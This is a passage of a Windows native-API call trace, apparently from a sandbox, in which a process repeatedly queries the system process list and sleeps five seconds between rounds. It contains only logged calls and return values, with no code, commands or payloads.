NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.123] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.124] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.124] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.124] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.126] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.126] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.127] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.127] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.127] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.128] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.128] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.130] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.130] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.142] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.142] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.143] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.143] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.143] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.145] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.146] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.158] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.158] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.159] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.159] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.160] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.162] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.163] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.177] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.177] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.178] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.178] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.178] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.180] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.180] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.190] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.190] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.191] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.191] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.191] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.193] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.194] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.205] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.205] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.205] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.206] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.206] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.208] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.208] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.223] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.224] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.224] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.224] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.225] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.226] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.227] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.236] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.236] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.237] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.237] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.237] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.239] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.240] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.252] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.252] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.252] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.253] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.253] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.255] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.255] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.267] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.267] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.268] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.268] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.268] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.271] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.271] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.283] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.283] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.284] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.284] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.284] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.287] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.287] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.298] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.299] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.299] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.299] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.300] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.302] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.302] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.314] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.315] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.315] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.315] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.317] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.318] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.330] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.331] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.331] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.332] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.332] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.334] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.334] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.345] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.345] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.346] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.346] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.346] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.348] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.349] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.361] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.361] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.362] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.362] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.362] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.364] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.364] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.376] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.377] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.377] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.378] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.378] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.380] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.381] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.392] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.392] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.393] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.393] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.393] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.395] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.396] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.407] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.408] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.408] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.409] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.409] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.410] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.411] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.423] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.424] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.424] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.424] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.424] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.426] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.427] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.439] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.440] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, 